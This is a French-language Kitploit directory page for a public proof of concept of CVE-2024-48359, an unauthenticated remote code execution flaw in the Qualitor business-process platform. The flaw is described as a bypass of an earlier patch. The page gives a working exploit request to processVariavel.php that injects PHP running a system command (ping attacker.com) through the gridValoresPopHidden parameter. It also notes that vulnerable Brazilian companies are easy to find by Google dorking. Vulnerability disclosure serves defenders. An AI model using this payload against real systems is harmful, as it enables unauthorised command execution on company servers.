Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-48359 — PoC CVE-2024-48359 | Kitploit
Outils/GitHubGitHub/openxp-research/cve-2024-48359
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubopenxp-research/cve-2024-48359

CVE-2024-48359

PoC CVE-2024-48359

Voir le dépôt
112il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-48359 - Qualitor <= v8.24 PoC d'exécution de code non authentifiée

CVE-2024-48359 | Qualitor <= v8.24 RCE

Description

Qualitor est une plateforme de gestion de processus métier, et ce système est présent dans diverses entreprises au Brésil qui peuvent être identifiées simplement en utilisant Google dorking.

Notre équipe a identifié une vulnérabilité dans l'application susceptible d'entraîner une exécution de code à distance (RCE), permettant l'exécution à distance de commandes système.

Ceci est un contournement du correctif de la CVE-2023-47253.

Preuve de concept (POC)

Envoyez simplement un code PHP dans la page processVariavel.php, ex : /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));

image

Recherches

https://www.linkedin.com/in/xvinicius/

https://www.linkedin.com/in/hairrison-wenning-4631a4124/

  • Équipe de recherche OpenXP
Télécharger l’outil